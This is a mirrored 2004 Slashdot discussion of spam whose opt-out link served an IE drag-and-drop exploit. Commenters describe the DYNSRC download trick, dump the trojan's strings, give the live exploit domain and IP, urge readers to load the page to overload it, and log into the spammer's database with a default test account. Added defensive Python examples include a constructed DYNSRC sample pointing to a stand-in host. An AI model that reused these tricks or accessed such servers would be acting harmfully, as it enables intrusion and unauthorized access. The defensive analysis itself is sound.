Slashdot Mirror


Spam Opt-out Link Triggers Malicious Code Attack

Maestro4k writes "The Register is reporting on a new spam E-mail circulating out there. In it, clicking on the 'Click here to remove' link launches a site, that when the user scrolls the page, triggers a drag-drop javascript exploit. Scarily the E-mail actually complies with the CAN-SPAM act as it only requires spammers to put an opt-out link in their mailings. As The Reg says "It comes as little surprise that this feature is being taken advantage of in a social engineering exploit; but it does illustrate the security problems of the opt-out approach that were always apparent to security experts - and ignored by legislators." The link in question points to www. xcelent.biz (As in The Reg story, space intentionally included) so even if you can't block the mail yet it should be easy to block access to the site with the exploit. I suspect this is just the beginning and most spam will include "features" such as this in the near future."

38 of 327 comments

  1. devious by hendridm · · Score: 4, Informative

    Fortunately, there is a patch for it, Mozilla is unaffected, and Norton and McAfee (at minimum) seem to detect it. That just leaves the millions of unpatched Windows machines that are running out-dated or low-grade antivirus!

    1. Re:devious by Anonymous Coward · · Score: 1, Informative

      For the lazy, the link in the article didn't work. For the lazy people who don't want to type, the link to the cited site is (www.xcelent.biz); but it's recommended you RTFA first to see what's on the site, and choose your browser carefully before clicking. Links like this make goatse look tame.

  2. I dont know about you by OverlordQ · · Score: 4, Informative

    but my AntiVirus has detected this exploit for a *long* time.

    JS/Exploit-DragDrop.b.gen

    --
    Your hair look like poop, Bob! - Wanker.

    1. Re:I dont know about you by Anonymous Coward · · Score: 1, Informative

      No excuse..

      http://www.free-av.com/
      http://free.grisoft.com/freeweb.php/doc/2/

    2. Re:I dont know about you by orangesquid · · Score: 4, Informative

      A simple string analysis of the trojan reveals some intimidating-looking strings:
      GetSystemDirectoryA, xProxyBot v 1.0.0, 1.0.0, w32.exe,
      Windows Service Application, www.earthlabs.biz,
      sockproxy/rec.php.
      Software\Microsoft\Windows\CurrentVersion\Run
      Software\Microsoft\Windows\CurrentVersion\RunServices
      %s?&p=%d&v=%s
      VisitWebPageThread, Socket4RandomThread, Socket4ServerThread
      SYSTEM\CurrentControlSet\Control\SafeBoot\
      explorer.exe
      Mozilla/4.0 (compatible)
      InternetCloseHandle, InternetGetLastResponseInfoA
      InternetReadFile, InternetCrackUrlA
      InternetOpenUrlA
      InternetOpenA, InternetConnectA
      FtpPutFileA, FtpGetFileA
      HttpSendRequestA, HttpOpenRequestA
      InternetGetConnectedStateEx, InternetGetConnectedState

      --
      TheOrangeSquid Is it any wonder things seem so awry? We swim in a sea of confusion and don't have to think to survive

  3. interesting strings by Anonymous Coward · · Score: 3, Informative

    the executable contains the strings "xProxyBot v 1.0.0" and www.earthlabs.biz/sockproxy/rec.php.

    1. Re:interesting strings by Anonymous Coward · · Score: 2, Informative

      Virus Scan for Linux v4.32.0
      Scan engine v4.3.20 for Linux.
      Virus data file v4394 created Sep 22 2004

      Identified it as:

      $ uvscan --secure windows-update32.exe
      /home/recall/windows-update32.exe
      Found the BackDoor-CHP trojan !!!

  4. Re:Microsoft says "No Problem" by Anonymous Coward · · Score: 5, Informative

    Here is the pertinent CERT advisory for this flaw.

    The idea is that all the website designer has to do is make an image that LOOKs like a scrollbar. The user goes and clicks and drags it to scroll down, not knowing it's fake. If there is a DYNSRC="..." attribute specified in the <IMG...> tag, Internet Explorer downloads and runs whatever program is specified, without any kinds of prompts whatsoever.

    Even with SP2 installed.

  5. opt out just confirms ur email address by Anonymous Coward · · Score: 1, Informative

    for all the other lists...

  6. New News? by Kartik3 · · Score: 5, Informative

    Spammers have often used an "unsubscribe" link or something similar only to verify your email address and send you more spam. While not the same as triggering an exploit, I've been under the impression that spammers have taken advantage of users with an "opt out" type of link in this way for quite a while now.

  7. lamer is hosted on hinet.com by Indy1 · · Score: 4, Informative

    host www.xcelent.biz
    www.xcelent.biz has address 61.218.79.53
    host 61.218.79.53
    53.79.218.61.in-addr.arpa domain name pointer 61-218-79-53.HINET-IP.hinet.net

    and people wonder why i firewall 60/7

    --
    Lawyers, MBA's, RIAA? A jedi fears not these things!

  8. MIME Defang by alatesystems · · Score: 2, Informative

    This is a good reason to use mime_defang with spamassassin. Either do that or what I do, have it actually attach the message as a .eml file (RFC 822 or whatever) and then you can view it in whatever you want and even reimport it into your mailbox.

    I hate spam, but I haven't had a false positive or negative in forever combining the bayes inside spamassassin with the bayes inside thunderbird.

    Chris

    1. Re:MIME Defang by gmuslera · · Score: 2, Informative

      Or better yet, Anomy Sanitizer. It disables "active" html content (i.e. javascript) attached to mails, can quarantine/rename files by extension, and of course, can call a configurable antivirus to check and take actions.

      That is mostly the way I use it, disabling html, checking attached files for viruses, and the Windows executable extensions that passed the antivirus check get renamed anyway to make them not executable without strong user action. Attached HTML pages sometimes don't look/work as desired, but I don't have to worry about someone receiving this particular piece of spam.
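
    An added example, not Anomy Sanitizer's or MIMEDefang's code and not written by anyone in this thread, of the gateway-side defanging two of the comments above describe: the sanitizer disables "active" HTML in mail bodies, and the CERT advisory summarised in comment 4 says an IMG tag's DYNSRC attribute makes IE download and run a program with no prompt. The stripper below removes script elements, on* event handlers, javascript: URLs and DYNSRC attributes, and reports each removal so a mail gateway can log or quarantine. The sample HTML and the host exploit-host.example in it are constructed.

```python
"""Added example; not Anomy Sanitizer's or MIMEDefang's code.

Strips the active content the thread talks about from an HTML mail body
before a client renders it: <script> elements, on* event handlers and
javascript: URLs are removed, and a DYNSRC attribute on <img> is dropped
because the CERT advisory quoted in the thread says IE fetches and runs
whatever it names.  Everything removed is reported so a gateway can log it.
"""
from html import escape
from html.parser import HTMLParser

ACTIVE_TAGS = {"script"}     # whole element dropped, body included
RISKY_ATTRS = {"dynsrc"}     # attribute dropped wherever it appears


class ActiveContentStripper(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=False)
        self.out = []          # rebuilt HTML fragments
        self.findings = []     # what was removed and why
        self._skip = 0         # > 0 while inside a dropped element

    def _filter_attrs(self, tag, attrs):
        kept = []
        for name, value in attrs:          # HTMLParser lower-cases names
            if name.startswith("on"):
                self.findings.append(f"removed {name} handler on <{tag}>")
            elif name in RISKY_ATTRS:
                self.findings.append(f"removed {name}={value!r} on <{tag}>")
            elif name in ("href", "src") and value and \
                    value.strip().lower().startswith("javascript:"):
                self.findings.append(f"removed javascript: {name} on <{tag}>")
            else:
                kept.append((name, value))
        return "".join(f" {n}" if v is None else f' {n}="{escape(v, quote=True)}"'
                       for n, v in kept)

    def handle_starttag(self, tag, attrs):
        if tag in ACTIVE_TAGS:
            self._skip += 1
            self.findings.append(f"dropped <{tag}> element")
        elif not self._skip:
            self.out.append(f"<{tag}{self._filter_attrs(tag, attrs)}>")

    def handle_startendtag(self, tag, attrs):   # <img ... /> and friends
        if tag in ACTIVE_TAGS:
            self.findings.append(f"dropped <{tag}> element")
        elif not self._skip:
            self.out.append(f"<{tag}{self._filter_attrs(tag, attrs)}>")

    def handle_endtag(self, tag):
        if tag in ACTIVE_TAGS:
            self._skip = max(0, self._skip - 1)
        elif not self._skip:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip:
            self.out.append(data)

    def handle_entityref(self, name):
        if not self._skip:
            self.out.append(f"&{name};")

    def handle_charref(self, name):
        if not self._skip:
            self.out.append(f"&#{name};")

    def handle_comment(self, data):
        pass   # HTML comments are dropped; they are a classic place to hide script


def sanitize_html(body):
    """Return (clean_html, findings) for one HTML mail body."""
    p = ActiveContentStripper()
    p.feed(body)
    p.close()
    return "".join(p.out), p.findings


# Constructed sample in the shape the thread describes: an image overlaying the
# scroll bar, a DYNSRC pointing at an executable, and scrolling done by script.
# exploit-host.example is a made-up host name.
SAMPLE_MAIL_HTML = (
    '<html><body onload="init()"><p>Click here to remove</p>'
    '<img src="scrollbar.gif" DYNSRC="http://exploit-host.example/windows-update.exe"'
    ' ondragstart="go()">'
    '<script>window.scrollBy(0, 1)</script>'
    '<a href="javascript:void(0)">link</a></body></html>'
)

if __name__ == "__main__":
    clean, findings = sanitize_html(SAMPLE_MAIL_HTML)
    print(clean)
    for f in findings:
        print("  -", f)
```

    Rebuilding the document from parser events, rather than deleting matched substrings, is what makes this robust against the attribute-case and spacing tricks a regex filter misses; the cost is that the output is normalised HTML, which is acceptable for mail.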

  9. Exploit by jargoone · · Score: 5, Informative

    The article didn't give much explanation about the drag-and-drop exploit itself. Understandably, given the audience, but I was curious. Here's a good link: http://xforce.iss.net/xforce/xfdb/13679

  10. Re:Greeting from Malaysia by Nos. · · Score: 3, Informative

    I tried to post the whois for the site as well as the whois for the IP that it's hosted on but gave up when /. said I had too many "junk" characters. Sheesh... here's a quick summary of the IP owner though:

    Yu, Shao
    4F, No. 7, Aly. 7, Lane 355, Sec. 2, Neihu Rd.
    Taipei City
    TW
    Shao Yu (SY167-TW) hn87788676@hn.hinet.net
    +886-9-36-045496

  11. Re:Use your powers for good by datastalker · · Score: 2, Informative

    It's a text site... it will take a lot to Slashdot it!

  12. "Scarily" by Anonymous Coward · · Score: 0, Informative

    not a word

  13. Re:Microsoft says "No Problem" by Anonymous Coward · · Score: 2, Informative

    This is my favorite part:

    III. Solution

    Disable Drag and drop or copy and paste files
    Disabling the zone security preference "Drag and drop or copy and paste files" prevents drag and drop operations.

    Note: This preference is not honored with Windows XP operating systems.

    Oh-well, at least it won't affect my Linux and OS/2 boxes if I turn that off.

  14. The only thing I click on in a Spam is... by vasqzr · · Score: 2, Informative

    The only thing you should be clicking on, in a spam message, is the delete icon/key.

  15. Even better - choose a link with graphics on. by cliveholloway · · Score: 4, Informative

    After a little guessing:

    a b c d. "d" looks pretty heavy on graphics.

    .02

    cLive ;-)

    --
    -- Trinity in high heels carrying a whip: The donimatrix - there is no spoonerism

  16. Re:Dumb by Benanov · · Score: 5, Informative

    That comment means it was ripped from a proof-of-concept website published a while ago: http://www.mikx.de/scrollbar/ Amazingly shameless. They stole this guy's code, AND they're using it for phishing attacks.

  17. Well I went to look at the virus by 3terrabyte · · Score: 2, Informative

    I thought it would be neat to see how good their fake-jpeg scrollbar was, so I loaded the page. I had no plans on 'scrolling down'.

    Didn't get that far. Just loading the page launched it. Anti-virus kicked in with a warning, home page was attempted to change, and then I got a call from headquarters to follow the delousing drill, since they also get all of our warnings.

    Well that was fun. Didn't get to see any scroll bar :(

    Windows 2000 - IE 5.50.4807.2300

    --

    Why are there only 19 people folding@home for slashdot?

    1. Re:Well I went to look at the virus by Naikrovek · · Score: 2, Informative

      The scrollbar is the real IE scroll bar, but there's an invisible image on top of it. When you click and drag you're actually dragging this image onto a small square that follows the mouse cursor - you can't avoid dropping it into that small image.

      The JS code scrolls the page for you, instead of the actual scroll bar. Since you're scrolling the page (via javascript) the real scroll bar reflects the new page position, making you think you actually were dragging the scroll bar.

      As you learned, the code doesn't need to be executed to trip the anti-virus. Oddly enough my corporate anti-virus didn't catch a thing (it didn't tell me it did anyway), and when I dropped, the empty .exe was installed.

      I won't tell you where I work but I will tell you that it's a place where you don't want viruses or spyware getting at the very personal data we have on 1:4 of you. You all opted-in for the data collection too. (very large insurance company) I will tell you that we're mandated to use IE and Outlook. Firefox installations will get anyone in this company in deep trouble - thanks SCO, for promoting fear of open source for your own selfish gain!

  18. Win32.Sokeven.D by davidwr · · Score: 2, Informative

    39,936 bytes
    Added to Computer Associates database 9/21/04

    What do other vendors call this?

    --
    Knowledge is how to play a game, intelligence is how to win, wisdom is knowing what game to play.

  19. Best port for a Slashdotting by Anonymous Coward · · Score: 1, Informative

    It is so much better to unsubscribe from this spam using the ssl connection (443). I checked, and it presents the same exploit page as the port 80 page with the benefit (for us) that it requires the extra computational resources of setting up an ssl session. Use the FOX and update often! https://61.218.79.53/o/

  20. Re:interesting ports on the spammer's site by sfe_software · · Score: 2, Informative

    3306/tcp open mysql

    Interestingly they never disabled the default "test" user for MySQL. Not that much can be done (user "test" has no privileges on any databases) but I was in fact able to log in...

    --
    NGWave - Fast Sound Editor for Windows

  21. Other sites on same server doing the same thing. by Chatmag · · Score: 4, Informative

    There is a slew of sites on that same server according to Webhosting Info that are infected, some with windows-update.exe and others with windows-update32.exe

    --
    Pete Carr Owner Chatmag.com

  22. Hazardous link by abb3w · · Score: 4, Informative

    Now, now, there might be someone who might go to that page with IE. However, no doubt the Slashdot community would be interested in attempting their own effort at reverse engineering the trojan that they want you to download.

    Of course, anyone who installs that on a non-isolated, non-virtual machine pretty much deserves the results. It looks like it has the standard "Software\Microsoft\Windows\CurrentVersion\Run", "Software\Microsoft\Windows\CurrentVersion\RunServices", and "SYSTEM\CurrentControlSet\Control\SafeBoot\" registry hooks. (Unix "strings" is your friend....)

    --
    //Information does not want to be free; it wants to breed.

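
    An added example, written for this page and not taken from any poster, of the `strings`-style triage that comment 2.2 (the string dump) and comment 22 ("strings is your friend") both do by hand: pull printable runs out of a binary and flag the indicator classes the thread reports, autorun and SafeBoot registry keys, a callback host/URL, and WinINet/FTP API names that show the file talks to the network. The byte string below is constructed to contain strings of the same shape as the dump; it is not the real windows-update.exe, and www.example.invalid is a made-up host.

```python
"""Added example, not code from the thread: a small stand-in for `strings`
plus the first-pass triage a defender does on its output.

Printable ASCII runs are pulled out of a binary and matched against
indicator classes reported for the dropped executable in the thread:
autorun registry keys, the SafeBoot key, a callback host/URL, and
WinINet/FTP API names.  SAMPLE_BINARY is constructed; it is not the real
windows-update.exe and www.example.invalid is a made-up host.
"""
import re

MIN_LEN = 6   # same idea as `strings -n 6`

# Patterns for the indicator classes seen in the thread's string dump.
INDICATORS = {
    "autorun-key": re.compile(
        r"Software\\Microsoft\\Windows\\CurrentVersion\\Run(?:Services)?", re.I),
    "safeboot-key": re.compile(
        r"SYSTEM\\CurrentControlSet\\Control\\SafeBoot", re.I),
    "url-or-host": re.compile(r"(?:https?://|www\.)[a-z0-9.-]+(?:/\S*)?", re.I),
    "wininet-api": re.compile(r"\b(?:Internet|Http|Ftp)[A-Za-z]+\b"),
}


def extract_strings(data, min_len=MIN_LEN):
    """Return printable ASCII runs of at least min_len bytes, in file order."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def triage(data):
    """Map each indicator class to the extracted strings that matched it."""
    hits = {}
    for s in extract_strings(data):
        for name, pat in INDICATORS.items():
            if pat.search(s):
                hits.setdefault(name, []).append(s)
    return hits


# Constructed sample: a fake header, some junk bytes, then NUL-separated
# strings shaped like the ones reported in the thread.
SAMPLE_BINARY = (
    b"MZ\x90\x00\x03\x00\x00\x00" + bytes(range(16)) +
    b"GetSystemDirectoryA\x00xProxyBot v 1.0.0\x00w32.exe\x00"
    b"Windows Service Application\x00www.example.invalid/sockproxy/rec.php\x00"
    b"Software\\Microsoft\\Windows\\CurrentVersion\\Run\x00"
    b"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\x00"
    b"SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\\x00"
    b"%s?&p=%d&v=%s\x00Mozilla/4.0 (compatible)\x00"
    b"InternetOpenUrlA\x00HttpSendRequestA\x00FtpPutFileA\x00"
    b"\x01\x02\x03"
)

if __name__ == "__main__":
    for category, matches in triage(SAMPLE_BINARY).items():
        print(category)
        for m in matches:
            print("   ", m)
```

    None of these strings proves a file is malicious on its own (WinINet imports are common), but the combination of a Run/RunServices key, a SafeBoot key and a callback URL in one small executable is exactly the profile the thread describes, and is worth a quarantine before anyone runs it.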
  23. I just got exploited by iMaple · · Score: 3, Informative

    I decided to try it out on my Windows machine, so opened the link in IE. I had Win XP SP2 and an updated Norton Antivirus and the (new) Win XP firewall on.
    But the exploit worked!! I was expecting to get a pop up from NAV with an exciting alarm sound.
    (Un)Fortunately since it worked now I know what it does:
    1) Add the windows-update.exe in the startup folder
    2) Add a new file cmd.dat to the startup folder.
    Anyway since I had gone so far, I tried running the Windows-update, but that gave me the error that it was not a valid exe file. I ran it in the protected mode (available when you select run as.. in Win XP). Then I renamed the dat file to .exe and ran that in the protected mode too. It ran!! It tried to access the internet but I hope the WinXP 2 firewall stopped it. Anyway got sort of scared since my Win Laptop is not junk and I use it whenever I need a Laptop with standby and Powerpoint. So now I have deleted the files. Can't see any new services in the registry either so hopefully my machine isn't yet a spam mail relay.
    BTW if anyone else has tried it out and knows about something else that should be done please let me know. And does anyone have a clue why NAV does not detect this?? Maybe you need to activate it for IE or make IE the default browser???

  24. Re:interesting ports on the spammer's site by 5m477m4n · · Score: 2, Informative

    hmmm, their certificate, issued to SomeOrganization expires on 9/21/2004.

    --
    Those who can, do
    Those who can't, teach
    Those who don't know how, supervise

  25. Re:But then again . . . by mdfst13 · · Score: 5, Informative

    http://www.xcelent.biz/d/ is a link to another page in that domain. Also has more graphics for better slashdotting potential.

    P.S. Still be careful. They could always move the pages around.

  26. BWHAHAHAHA! by Anonymous Coward · · Score: 1, Informative

    Honestly, if you "surf" the web these days with:

    1) Flash
    2) Java
    3) Javascript

    You are simply asking for an anal reaming. The answer is to use a "secure" browser for common everyday browsing, which will display html and pictures. No cookies, flash, java, or javascript.

    And then use a second browser and copy/paste the url when you need more functionality.

  27. Re:More Legislation Needed. by FuzzyBad-Mofo · · Score: 2, Informative

    Assent is a perfectly good word, but noone is not.

    Your braking my hart, I hate to be a looser grammar nazi, but it's these errors witch need two bee preventated.

  28. Simple really... by johannesg · · Score: 2, Informative

    They hired Slashdot to take it down, and we are working on it even as I type this.

  29. Re:Microsoft says "No Problem" by Anonymous Coward · · Score: 1, Informative

    Make sure that you see the link does not have I'm Feeling Lucky in it; you can copy-paste it to notepad if you like to decipher it. Right click, copy link address.

    If btnG is in the link (as in btnG=Google+Search) then it's a search; if btnI is, it's I'm Feeling Lucky, and will take you directly to the url. Same if http:// is in the url, as google believes you meant to go to that address.
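
    An added example, not from the thread or any tool it names, of the link triage a mail filter can do before anyone follows an opt-out link. It applies three checks raised in the discussion: the submission's suggestion of blocking the exploit site by host name, comment 7's firewalling of a whole address range, and the comment above on spotting a Google search link that carries btnI (I'm Feeling Lucky) or a URL in q=, either of which forwards the visitor somewhere other than google.com. The blocklist, the blocked range (TEST-NET-3 stands in for the poster's 60/7), the DNS answers and the host exploit-host.example are all constructed so the code runs offline.

```python
"""Added example; not from the thread or any tool it names.

Triage of a link lifted from a mail before anyone follows it, using three
checks the discussion raises: the host is on a blocklist, the host or bare
IP sits in a firewalled range, or the link is a Google search with btnI=
(I'm Feeling Lucky) or a q= that is itself a URL, both of which forward
the visitor away from google.com.  Blocklist, range and DNS answers are
constructed so the example runs offline; exploit-host.example is made up.
"""
import ipaddress
from urllib.parse import parse_qs, urlsplit

BLOCKED_HOSTS = {"exploit-host.example"}                    # constructed
# Constructed stand-in (TEST-NET-3) for a range like the poster's 60/7.
BLOCKED_NETS = [ipaddress.ip_network("203.0.113.0/24")]
FAKE_DNS = {                                                # constructed answers
    "exploit-host.example": "203.0.113.5",
    "www.google.com": "198.51.100.7",
    "mail.example.org": "192.0.2.8",
}


def resolve(host):
    """Offline stand-in for a DNS lookup; returns an IP string or None."""
    try:
        return str(ipaddress.ip_address(host))   # bare-IP links need no lookup
    except ValueError:
        return FAKE_DNS.get(host)


def classify_link(url):
    """Return the reasons a link is suspicious; an empty list means none found."""
    reasons = []
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if host in BLOCKED_HOSTS:
        reasons.append("host on blocklist")
    ip = resolve(host)
    if ip and any(ipaddress.ip_address(ip) in net for net in BLOCKED_NETS):
        reasons.append(f"points to {ip} in a blocked range")
    if host == "google.com" or host.endswith(".google.com"):
        qs = parse_qs(parts.query)
        if parts.path == "/search" and "btnI" in qs:
            reasons.append("Google I'm Feeling Lucky redirect (btnI)")
        if any(v.strip().lower().startswith("http") for v in qs.get("q", [])):
            reasons.append("Google query is a URL, which acts as a redirect")
    return reasons


if __name__ == "__main__":
    for link in (
        "http://exploit-host.example/o/",
        "https://203.0.113.9/o/",
        "http://www.google.com/search?q=exploit-host.example&btnI=I%27m+Feeling+Lucky",
        "https://mail.example.org/inbox",
    ):
        print(link, "->", classify_link(link) or "ok")
```

    Resolving the host and checking the address, rather than matching the name alone, is what catches the ssl-on-443 and bare-IP variants of the same link that other posters in this thread found; swap `resolve` for a real lookup in production.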

  30. DNS trace - Lets give the address' owner a call by Honest+Man · · Score: 3, Informative

    Well, we could always call the owner of the site and tell him how much we 'so' appreciate his exploit being used on ppl.

    Domain Name: XCELENT.BIZ
    Domain ID: D7752456-BIZ
    Sponsoring Registrar: CSL COMPUTER SERVICE (D.B.A. JOKER.COM)
    Domain Status: clientTransferProhibited
    Registrant ID: CNEU-105661
    Registrant Name: Anandan Krishan
    Registrant Organization: Iscon & Krishan
    Registrant Address1: Suite 50-12
    Registrant Address2: Jalan Yap Kwan Seng.
    Registrant City: Kuala Lumpur
    Registrant State/Province: KL
    Registrant Postal Code: 50450
    Registrant Country: Malaysia
    Registrant Country Code: MY
    Registrant Phone Number: +603.27756842
    Registrant Facsimile Number: +603.27756642
    Registrant Email: win2save@yahoo.com
    Administrative Contact ID: CNEU-105617
    Administrative Contact Name: Anandan Krishan
    Administrative Contact Organization: Iscon & Krishan
    Administrative Contact Address1: Suite 50-12
    Administrative Contact Address2: Jalan Yap Kwan Seng.
    Administrative Contact City: Kuala Lumpur
    Administrative Contact State/Province: KL
    Administrative Contact Postal Code: 50450
    Administrative Contact Country: Malaysia
    Administrative Contact Country Code: MY
    Administrative Contact Phone Number: +603.27756842
    Administrative Contact Facsimile Number: +603.27756642
    Administrative Contact Email: win2save@yahoo.com
    Billing Contact ID: CNEU-105617
    Billing Contact Name: Anandan Krishan
    Billing Contact Organization: Iscon & Krishan
    Billing Contact Address1: Suite 50-12
    Billing Contact Address2: Jalan Yap Kwan Seng.
    Billing Contact City: Kuala Lumpur
    Billing Contact State/Province: KL
    Billing Contact Postal Code: 50450
    Billing Contact Country: Malaysia
    Billing Contact Country Code: MY
    Billing Contact Phone Number: +603.27756842
    Billing Contact Facsimile Number: +603.27756642
    Billing Contact Email: win2save@yahoo.com
    Technical Contact ID: CNEU-105617
    Technical Contact Name: Anandan Krishan
    Technical Contact Organization: Iscon & Krishan
    Technical Contact Address1: Suite 50-12
    Technical Contact Address2: Jalan Yap Kwan Seng.
    Technical Contact City: Kuala Lumpur
    Technical Contact State/Province: KL
    Technical Contact Postal Code: 50450
    Technical Contact Country: Malaysia
    Technical Contact Country Code: MY
    Technical Contact Phone Number: +603.27756842
    Technical Contact Facsimile Number: +603.27756642
    Technical Contact Email: win2save@yahoo.com
    Name Server: NS1.GRAITHBOADER.BIZ
    Name Server: NS2.GRAITHBOADER.BIZ
    Name Server: NS2.TIKONDES.BIZ
    Created by Registrar: CSL COMPUTER SERVICE (D.B.A. JOKER.COM)
    Last Updated by Registrar: CSL COMPUTER SERVICE (D.B.A. JOKER.COM)
    Domain Registration Date: Wed Sep 15 03:53:27 GMT 2004
    Domain Expiration Date: Wed Sep 14 23:59:59 GMT 2005
    Domain Last Updated Date: Wed Sep 15 04:03:16 GMT 2004

  31. Re:Fill his database by gad_zuki! · · Score: 2, Informative

    Because people typing their email addresses into that box means its a "known-good" email address. A list of known-goods beats a list of dead addresses any day of the week.

  32. Re:interesting ports on the spammer's site by BillX · · Score: 2, Informative

    mysql> show databases;

    (snipped thanks to lameness filter)

    4 rows in set (11.56 sec)

    mysql> use test;
    Reading table information for completion of table and column names
    You can turn off this feature to get a quicker startup with -A
    ...and there it's been sitting for the past half hour or more. I love that 12-seconds just to display the list of DBs. Congratulations Slashdot, you slashdotted the spammer's sql server!

    --
    Caveat Emptor is not a business model.